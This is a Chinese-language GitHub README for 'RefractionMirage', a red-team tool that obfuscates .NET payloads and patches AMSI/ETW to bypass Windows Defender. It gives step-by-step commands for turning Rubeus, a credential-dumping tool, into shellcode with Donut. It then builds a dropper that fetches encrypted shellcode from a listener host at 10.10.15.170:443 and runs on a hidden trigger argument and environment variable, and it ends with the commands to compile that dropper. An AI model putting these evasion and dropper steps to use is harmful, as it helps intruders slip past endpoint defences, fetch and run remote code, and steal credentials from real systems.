ZumiYumi/RefractionMirage
GitHub: ZumiYumi/RefractionMirage
该工具用于在红队行动中对 .NET payload 进行动态混淆并绕过 Windows Defender 的 AMSI/ETW 检测机制。
Stars: 35 | Forks: 5
# RefractionMirage
远程动态 .NET 混淆器和 AMSI/ETW 补丁工具,用于绕过 Defender
## 1. 安装
```
git clone https://github.com/ZumiYumi/RefractionMirage
```
## 2. 运行 Donut
```
donut -i Rubeus.exe -p "dump" -o rubeus.bin
```
## 3. 运行 Loader 并编译
```
python refractionmirage.py --binary rubeus.bin --lhost 10.10.15.170 --lport 443 --urlpath rubeus_enc.bin --output dropper.cs
# 示例输出
# [+] 加密 shellcode 已保存至 rubeus_enc.bin(请托管此文件)
# [+] Dropper 已写入 dropper.cs
# [+] 触发参数:--oayvnf
# [+] 触发环境变量:ACOOSBOS_MODE=1
# [+] Payload URL:http://10.10.15.170:443/rubeus_enc.bin
# [*] 如果使用 Donut,请使用以下命令生成 shellcode:
# donut -i -o payload.bin
# [*] 在 Windows (x64) 上编译:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /platform:x64 /out:RefractionMirage.exe dropper.cs
# [*] 然后运行:RefractionMirage.exe --oayvnf
```
您可以按照上述说明进行编译,或者直接复制 refractionmirage.cs 并将其粘贴到 Visual Studio 中。
## 演示

标签:DNS 反向解析, 逆向工具